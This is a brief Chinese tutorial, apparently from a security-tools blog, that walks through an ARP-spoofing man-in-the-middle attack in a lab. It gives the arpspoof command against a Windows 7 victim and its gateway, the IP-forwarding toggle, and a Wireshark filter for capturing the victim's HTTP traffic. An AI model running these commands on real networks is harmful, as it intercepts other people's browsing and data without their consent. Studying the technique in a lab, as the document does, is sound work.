利用arpspoof工具获取内网浏览器信息

我很难过，不甘心，有一肚子委屈。。。

翻译一下：

“I'm fine......”

----  网易云热评

 

 

环境：小攻：Kali 2020，ip：192.168.152.133

          小受：win7 x86，ip：192.168.152.189

 

 

一、工具安装

1、arpspoof是dsniff 的一个附属工具，所以我们需要安装的是 dsniff

2、安装命令：apt-get install dsniff

 

二、IP转发，如果不转发小受会断网

1、开启转发

[email protected]:/# echo 1 >/proc/sys/net/ipv4/ip_forward

2、关闭转发

[email protected]:/# echo 0 >/proc/sys/net/ipv4/ip_forward

 

三、开始监听

arpspoof -t 192.168.152.189 192.168.152.2

-t 指定小受ip及网关地址

 

四、打开wireshark捕获数据包

[email protected]:~# wireshark

 

五、小受访问一下网站

1、www.soho.com、www.baidu.com

2、可以在捕获数据包中设置过滤

ip.src==192.168.152.189&&http

只查看源地址为192.168.152.189并且是htpp类型的数据包

禁止非法，后果自负

欢迎关注公众号：web安全工具库